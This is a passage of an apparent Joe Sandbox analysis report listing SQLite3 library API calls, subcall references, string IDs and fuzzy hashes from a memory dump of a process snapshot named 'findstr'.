                                                                                                      • Part of subcall function 61E17F2E: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E17F65
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E2224D), ref: 61E17F99
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E182E4
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E8799F
                                                                                                    • sqlite3_realloc64.SQLITE3 ref: 61E879D4
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E879FC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializesqlite3_realloc64
                                                                                                    • String ID:
                                                                                                    • API String ID: 1177761455-0
                                                                                                    • Opcode ID: 250c329ef8e76b69484ec08b9b6e51eeecade9024af33afd30ced76282e184eb
                                                                                                    • Instruction ID: e9907a13dd7bc320fb7b109543e343aafe50b94c4c1de274449ade6f7aa882ad
                                                                                                    • Opcode Fuzzy Hash: 250c329ef8e76b69484ec08b9b6e51eeecade9024af33afd30ced76282e184eb
                                                                                                    • Instruction Fuzzy Hash: B6017574B086519BD7009FA9C44171D7BE5FB8A398F29893DD988CB310E735D492C751
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: __dllonexit_lock_onexit_unlock
                                                                                                    • String ID:
                                                                                                    • API String ID: 209411981-0
                                                                                                    APIs
                                                                                                    • sqlite3_vmprintf.SQLITE3 ref: 61E377F9
                                                                                                      • Part of subcall function 61E34761: sqlite3_initialize.SQLITE3 ref: 61E34767
                                                                                                    • sqlite3_mprintf.SQLITE3 ref: 61E37823
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E3782E
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E37841
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_initializesqlite3_mprintfsqlite3_vmprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 690915108-0
                                                                                                    APIs
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E0C949
                                                                                                      • Part of subcall function 61E0A227: sqlite3_free.SQLITE3 ref: 61E0A248
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E0C95C
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E0C93E
                                                                                                      • Part of subcall function 61E09B75: sqlite3_mutex_enter.SQLITE3 ref: 61E09B94
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E0C98A
                                                                                                      • Part of subcall function 61E0A3BE: sqlite3_free.SQLITE3 ref: 61E0A3CF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_mutex_enter
                                                                                                    • String ID:
                                                                                                    • API String ID: 3930042888-0
                                                                                                    APIs
                                                                                                    • sqlite3_initialize.SQLITE3 ref: 61E18301
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E17F65
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E2224D), ref: 61E17F99
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E182E4
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E18319
                                                                                                    • strcmp.MSVCRT ref: 61E18336
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E18347
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializestrcmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 2933023327-0
                                                                                                    APIs
                                                                                                      • Part of subcall function 61E5442B: sqlite3_reset.SQLITE3 ref: 61E54451
                                                                                                      • Part of subcall function 61E5442B: sqlite3_finalize.SQLITE3 ref: 61E54467
                                                                                                      • Part of subcall function 61E52C19: sqlite3_free.SQLITE3 ref: 61E52C4A
                                                                                                      • Part of subcall function 61E52C19: sqlite3_free.SQLITE3 ref: 61E52C52
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E544A7
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E5449D
                                                                                                      • Part of subcall function 61E09B75: sqlite3_mutex_enter.SQLITE3 ref: 61E09B94
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E544BB
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E544CB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_finalizesqlite3_mutex_entersqlite3_reset
                                                                                                    • String ID:
                                                                                                    • API String ID: 2080152953-0
                                                                                                    APIs
                                                                                                    • sqlite3_vmprintf.SQLITE3 ref: 61E366FF
                                                                                                      • Part of subcall function 61E34761: sqlite3_initialize.SQLITE3 ref: 61E34767
                                                                                                    • sqlite3_mprintf.SQLITE3 ref: 61E3671D
                                                                                                      • Part of subcall function 61E35200: sqlite3_initialize.SQLITE3 ref: 61E35206
                                                                                                      • Part of subcall function 61E35200: sqlite3_vmprintf.SQLITE3 ref: 61E35220
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E36729
                                                                                                      • Part of subcall function 61E09B75: sqlite3_mutex_enter.SQLITE3 ref: 61E09B94
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E36731
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_initializesqlite3_vmprintf$sqlite3_mprintfsqlite3_mutex_enter
                                                                                                    • String ID:
                                                                                                    • API String ID: 2126213637-0
                                                                                                    APIs
                                                                                                      • Part of subcall function 61E52FC6: sqlite3_blob_close.SQLITE3 ref: 61E52FD4
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E5300C
                                                                                                      • Part of subcall function 61E09B75: sqlite3_mutex_enter.SQLITE3 ref: 61E09B94
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E53017
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E53022
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E5302A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_blob_closesqlite3_mutex_enter
                                                                                                    • String ID:
                                                                                                    • API String ID: 1319845086-0
                                                                                                    APIs
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E52B47
                                                                                                      • Part of subcall function 61E09B75: sqlite3_mutex_enter.SQLITE3 ref: 61E09B94
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E52B58
                                                                                                    • sqlite3_blob_close.SQLITE3 ref: 61E52B63
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E52B6B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_blob_closesqlite3_mutex_enter
                                                                                                    • String ID:
                                                                                                    • API String ID: 1319845086-0
                                                                                                    APIs
                                                                                                    • sqlite3_initialize.SQLITE3 ref: 61E87A12
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E17F65
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E2224D), ref: 61E17F99
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E182E4
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E87A2A
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E87A37
                                                                                                      • Part of subcall function 61E09B75: sqlite3_mutex_enter.SQLITE3 ref: 61E09B94
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E87A53
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_enter$sqlite3_mutex_leave$sqlite3_configsqlite3_freesqlite3_initialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 3512769177-0
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free
                                                                                                    • String ID: a
                                                                                                    • API String ID: 2313487548-581836851
                                                                                                    APIs
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E30F40
                                                                                                      • Part of subcall function 61E09B75: sqlite3_mutex_enter.SQLITE3 ref: 61E09B94
                                                                                                    • sqlite3_strnicmp.SQLITE3 ref: 61E31021
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_mutex_entersqlite3_strnicmp
                                                                                                    • String ID: a
                                                                                                    • API String ID: 541736041-581836851
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_strnicmp
                                                                                                    • String ID: '$null
                                                                                                    • API String ID: 1961171630-2611297978
                                                                                                    APIs
                                                                                                    • sqlite3_win32_is_nt.SQLITE3 ref: 61E26F6F
                                                                                                      • Part of subcall function 61E17892: InterlockedCompareExchange.KERNEL32 ref: 61E178B2
                                                                                                      • Part of subcall function 61E17892: InterlockedCompareExchange.KERNEL32 ref: 61E178F9
                                                                                                      • Part of subcall function 61E17892: InterlockedCompareExchange.KERNEL32 ref: 61E17919
                                                                                                      • Part of subcall function 61E1781C: sqlite3_win32_sleep.SQLITE3 ref: 61E17874
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E2703A
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: CompareExchangeInterlocked$sqlite3_freesqlite3_win32_is_ntsqlite3_win32_sleep
                                                                                                    • String ID: winDelete
                                                                                                    • API String ID: 3336177498-3936022152
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 3
                                                                                                    • API String ID: 0-1842515611
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: Virtual$ProtectQuery
                                                                                                    • String ID: @
                                                                                                    • API String ID: 1027372294-2766056989
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E75846
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E758AB
                                                                                                      • Part of subcall function 61E261DF: sqlite3_log.SQLITE3 ref: 61E26208
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID: a
                                                                                                    • API String ID: 4224044155-581836851
                                                                                                    APIs
                                                                                                    • sqlite3_stricmp.SQLITE3(00000000,?,?,61E5D610), ref: 61E03D18
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_stricmp
                                                                                                    • String ID: sqlite_master$sqlite_temp_master
                                                                                                    • API String ID: 912767213-3047539776
                                                                                                    APIs
                                                                                                    • sqlite3_snprintf.SQLITE3(?,?,?,?,?,?,?,?,?,?,61E237C6,?,?,?,61E237EA,00000000), ref: 61E236EA
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_snprintf
                                                                                                    • String ID: a
                                                                                                    • API String ID: 949980604-581836851
                                                                                                    APIs
                                                                                                    • sqlite3_aggregate_context.SQLITE3 ref: 61E1EC49
                                                                                                    • sqlite3_value_numeric_type.SQLITE3 ref: 61E1EC55
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                                                                    • String ID:
                                                                                                    • API String ID: 3265351223-3916222277
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_int
                                                                                                    • String ID: 7a
                                                                                                    • API String ID: 940139405-935942030
                                                                                                    Similarity
                                                                                                    • API ID: reallocsqlite3_log
                                                                                                    • String ID: ja
                                                                                                    • API String ID: 576635218-4192907673
                                                                                                    APIs
                                                                                                    • InitializeCriticalSection.KERNEL32 ref: 61E177B8
                                                                                                    • sqlite3_win32_sleep.SQLITE3 ref: 61E177DF
                                                                                                    Similarity
                                                                                                    • API ID: CriticalInitializeSectionsqlite3_win32_sleep
                                                                                                    • String ID: HF
                                                                                                    • API String ID: 3721583994-543897734
                                                                                                    APIs
                                                                                                    • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E5CB65), ref: 61E28BFA
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_log
                                                                                                    • String ID: %a$Ra
                                                                                                    • API String ID: 632333372-2165777612
                                                                                                    • Opcode ID: af3219847a3537b00ddd95d194e4fda69e012d5791079b8f53a6eccfcc50ecd2
                                                                                                    • Instruction ID: 54e453b86644c98d42bf4d3b854f3a2ecff178396eef6d2c7becdacd7e064464
                                                                                                    • Opcode Fuzzy Hash: af3219847a3537b00ddd95d194e4fda69e012d5791079b8f53a6eccfcc50ecd2
                                                                                                    • Instruction Fuzzy Hash: 70E0DFB02097418BF3045BAA8523B06BAE46BC0388F30C42DD89887395EBB0D481A343
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_int, sqlite3_value_text
                                                                                                    • String ID: a
                                                                                                    • API String ID: 3072509329-581836851
                                                                                                    • Opcode ID: 07f0d302396d2b7972cb1ddc3a6258b9a52aa55105b608bdf947151053f3ca0d
                                                                                                    • Instruction ID: 69e9ee0bcd1793300845458a466b9f9e1e2faeed39614b47462cb0066e70609f
                                                                                                    • Opcode Fuzzy Hash: 07f0d302396d2b7972cb1ddc3a6258b9a52aa55105b608bdf947151053f3ca0d
                                                                                                    • Instruction Fuzzy Hash: 85E04F70904799DBCB00EF69C4C559ABBE8FB08360B10C95AEC588B301D375E450CBD1